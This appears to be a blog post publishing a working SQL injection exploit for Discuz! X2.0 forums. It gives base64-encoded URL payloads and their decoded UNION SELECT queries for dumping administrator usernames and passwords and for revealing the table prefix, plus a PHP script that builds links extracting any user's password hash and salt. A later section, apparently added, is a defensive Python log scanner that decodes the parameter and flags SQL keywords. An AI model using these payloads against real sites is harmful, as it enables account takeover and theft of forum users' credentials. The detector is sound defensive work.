
Discuz! X2.0 SQL Injection Vulnerability EXP

IT圈 admin

Posted on February 25, 2024 (author: 厚晨菲)

DZ2.0: directly dump the administrator account and password (when the default table prefix is in use)

/?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V

sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd

29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl

rZSAnYWRtaW58eHx5%3D

Base64-decoded, the aid value is:

1' and 1=2 union all select 1,group_concat(username,0x7C3274747C,password) from pre_common_member where username like 'admin|x|y

If the default prefix is not in use

EXP to reveal the table prefix

/?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V

sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR

VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1

FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D

———————–

Here is a PHP version of the EXP as well

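<?php
$host="X2.0论坛地址";             // base URL of the X2.0 forum (placeholder)
$affuser="要爆的用户名username";   // username to look up (placeholder)

// First link: the aid value carries the table-prefix query, base64- then URL-encoded.
echo '<a href="';
echo $host."?mod=attachment&findpost=ss&aid=";
echo urlencode(base64_encode("1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_ where TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|y"));
echo '" target="_blank">爆前缀';   // link text: "reveal prefix"
echo "
";

// Second link: the aid value carries the password and salt query for $affuser.
echo '<a href="';
echo $host."?mod=attachment&findpost=ss&aid=";
echo urlencode(base64_encode("1' and 1=2 union all select 1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username like '$affuser|x|y"));
echo '" target="_blank">爆password,salt';   // link text: "reveal password, salt"
?>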
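
A defender-side check for the requests shown above, as an added example that is not part of the original post: because the SQL travels base64-encoded inside aid, keyword filters on the raw query string see nothing, so this sketch decodes aid before matching. The log format, the keyword list and the sample lines are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, quote, urlsplit

# SQL fragments that have no place in a decoded attachment id (assumed rule set).
SQLI_RE = re.compile(
    r"'|\bunion\b.+\bselect\b|information_schema|group_concat\s*\(",
    re.IGNORECASE | re.DOTALL,
)

def decode_aid(aid):
    """Leniently base64-decode an aid value; None if it cannot be decoded."""
    # '+' arrives as a space after query parsing; drop stray or excess padding.
    clean = re.sub(r"[^A-Za-z0-9+/]", "", aid.replace(" ", "+"))
    try:
        raw = base64.b64decode(clean + "=" * (-len(clean) % 4))
    except binascii.Error:
        return None
    return raw.decode("utf-8", "replace")

def inspect_request(target):
    """Classify a request target: 'ignore', 'ok', 'undecodable' or 'sqli'."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if query.get("mod") != ["attachment"] or "aid" not in query:
        return "ignore"
    decoded = decode_aid(query["aid"][0])
    if decoded is None:
        return "undecodable"
    return "sqli" if SQLI_RE.search(decoded) else "ok"

def scan(log_lines):
    """Return 1-based numbers of log lines whose aid decodes to SQL."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if match and inspect_request(match.group(1)) == "sqli":
            hits.append(number)
    return hits

def _line(inner):
    """Build one constructed access-log line carrying base64(inner) as aid."""
    aid = quote(base64.b64encode(inner.encode()).decode(), safe="")
    return f'192.0.2.10 - - [25/Feb/2024:10:00:00 +0000] "GET /?mod=attachment&aid={aid} HTTP/1.1" 200 512'

# Constructed sample log: a benign-looking id, an id carrying SQL, an unrelated page.
SAMPLE_LOG = [
    _line("101|5f2a9c1e|1300000000|0|2045"),
    _line("1' and 1=2 union all select 1,2"),
    '192.0.2.11 - - [25/Feb/2024:10:00:05 +0000] "GET /?mod=forumdisplay&fid=2 HTTP/1.1" 200 900',
]
```

Calling scan(SAMPLE_LOG) reports only the second line. The same decode-then-validate step belongs in the application itself, where the decoded aid should be cast to an integer or bound as a query parameter instead of being concatenated into SQL.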
